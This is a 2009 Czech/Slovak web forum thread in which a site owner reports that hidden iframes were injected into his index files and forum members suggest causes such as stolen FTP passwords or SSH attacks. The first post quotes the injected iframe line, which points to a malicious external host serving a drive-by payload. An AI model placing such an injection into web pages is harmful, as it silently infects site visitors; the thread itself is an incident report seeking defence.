Prosíme přihlašte se nebo zaregistrujte.

Přihlašte se svým uživatelským jménem a heslem.
Vaše pomoc je stále potřeba!

Autor Téma: Ochrana pred hacknutím [vyriešené]  (Přečteno 3433 krát)

romciiik

  • Stálý člen
  • **
  • Příspěvků: 532
    • romiix.org
Ochrana pred hacknutím [vyriešené]
« kdy: 16 Dubna 2009, 14:58:03 »
ahoj,
dnes ma hackli ale netuším ako..
každý súbor ktorý má názov "index*.*" má vložený kód za html tag "<body>" a ak neexistuje tak na konci suboru:
Kód: [Vybrat]
<iframe src="http://hotslotpot.cn/in.cgi?income64" width=1 height=1 style="visibility: hidden"></iframe>Tento kód neodporúčam spúšťať! Nemám tušenia čo to má byť!
Skúsil som spustiť to "cgi" a načítalo mi do framu pdf ktoré (podla zdrojáka usudzujem) je generované javascriptom.
útok pravdepodobne prišiel z IP 94.247.3.150
Neviete niekto náhodou ako sa mi to mohlo stať, resp. ako mám zabezpečiť aby sa to už nestalo?

« Poslední změna: 25 Dubna 2009, 12:08:27 od romciiik »

stderr

  • Aktivní člen
  • *
  • Příspěvků: 275
  • globglob, Charliee, we're scuba diving Charlieee!
Re: Ochrana pred hacknutím
« Odpověď #1 kdy: 16 Dubna 2009, 15:56:43 »
1. moznost:
Pouzivas Total Commander? Pak neukladej hesla pro FTP, maji slaby sifrovani. Vir ve Win je prelouska, prihlasi na FTP a do indexu zapise tento iframe (v ruznych obmenach)
2. moznost:
Utok na ssh. Takze pouzivat silny hesla.
Fedora & CentOS (RHEL) user ... co tu vlastně dělám?
Blog /dev/stderr & twitr

kkaarreell

  • Stálý člen
  • **
  • Příspěvků: 1072
Re: Ochrana pred hacknutím
« Odpověď #2 kdy: 16 Dubna 2009, 18:53:19 »
moznosti je milion.. univerzalni rada neexistuje, snad jen nezapinat pocitac ci jej nepripojovat k netu.. a kdyz uz, tak pak neprovozovat sluzby (jako webserver,...), kterym nerozumis.
ze stejnyho duvodu ti nikdo nerekne, v cem to bylo.. moznosti je opet plno a bylo by treba poradne kontroly komplu.

Pavel Půlpán

Re: Ochrana pred hacknutím
« Odpověď #3 kdy: 16 Dubna 2009, 18:57:28 »
a kdyz uz, tak pak neprovozovat sluzby (jako webserver,...), kterym nerozumis.

(K)ámen! 8) Čím víc služeb běží, tím je server děravější. Co se týče hesel, tak často měnit a nešetřit na nich... já si je generuju jednou tejdně a pak se mi Ntz směje, že si je nepamatuju. ;D

romciiik

  • Stálý člen
  • **
  • Příspěvků: 532
    • romiix.org
Re: Ochrana pred hacknutím
« Odpověď #4 kdy: 17 Dubna 2009, 22:11:24 »
toto nie je konkrétne na vlastnom stroji ale na profi hostingu (už na dvoch rôznych!!). stalo sa to na dvoch stránkach ktoré mám na starosti.
ÁNO total commander mám, používam, už nebudem!
Náhoda (?) je že na tích konkrétnych dvoch doménach som mal nainštalovaný Piwik ( http://piwik.org/ ). je to opensource projekt, nechcem ho obvinovat ale na inde sa to zatial neprejavilo.

po opravení všetných odkazov na "vírus"  sa to tam vložilo za pár hodín znovu. prvý bol na servri (kontrolovaný čas modifikácie cez FAR) zmenený index.php v priečinku piwik. po odstánení piwiku sa to (zatiaľ) neobnovilo.

Neinštalovať piwik a pomeniť heslá a malo by to byť OK?

Ďakujem za cenné rady!!

kkaarreell

  • Stálý člen
  • **
  • Příspěvků: 1072

romciiik

  • Stálý člen
  • **
  • Příspěvků: 532
    • romiix.org
Re: Ochrana pred hacknutím
« Odpověď #6 kdy: 25 Dubna 2009, 12:08:12 »
viem viem, videl som už, aj čítal. vďaka za snahu, predsa len ste tu na problém prišli skôr.

 

Provoz zaštiťuje spolek OpenAlt.